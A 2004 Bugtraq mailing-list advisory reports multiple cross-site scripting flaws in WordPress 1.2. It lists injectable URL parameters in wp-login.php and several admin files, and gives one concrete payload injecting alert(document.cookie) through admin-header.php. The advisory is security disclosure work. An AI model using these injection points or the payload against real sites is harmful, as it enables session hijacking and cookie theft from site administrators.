[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple XSS Vulnerabilities in Wordpress 1.2
From: Thomas Waldegger <bugtraq () morph3us ! org>
Date: 2004-09-27 23:16:08
Message-ID: 20040927231608.19365.qmail () www ! securityfocus ! com
[Download RAW message or body]
Vendor : Wordpress
URL : http://wordpress.org/
Version : Wordpress 1.2
Risk : XSS
Description:
WordPress is a state-of-the-art semantic personal publishing platform with a focus on \
aesthetics, web standards, and usability. [...] Go to http://wordpress.org/ for \
detailed information.
Cross Site Scripting:
wp-login.php:
/wp-login.php?redirect_to=[XSS]
/wp-login.php?mode=bookmarklet&text=[XSS]
/wp-login.php?mode=bookmarklet&popupurl=[XSS]
/wp-login.php?mode=bookmarklet&popuptitle=[XSS]
Nearly every file in the administration panel of wordpress is vulnerable for XSS \
attacks.
admin-header.php:
/admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)//
Nice bug. ;o)
bookmarklet.php:
/bookmarklet.php?popuptitle=[XSS]
/bookmarklet.php?popupurl=[XSS]
/bookmarklet.php?content=[XSS]
/bookmarklet.php?post_title=[XSS]
categories.php:
/categories.php?action=edit&cat_ID=[XSS]
edit.php:
/edit.php?s=[XSS]
edit-comments.php:
/edit-comments.php?s=[XSS]
/edit-comments.php?mode=[XSS]
and so on ...
Solution:
There is not any solution yet. I contacted Matthew Mullenweg, one of the lead \
developers of wordpress, on Wednesday but I did not receive any answer until yet.
Credits:
Thomas Waldegger
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic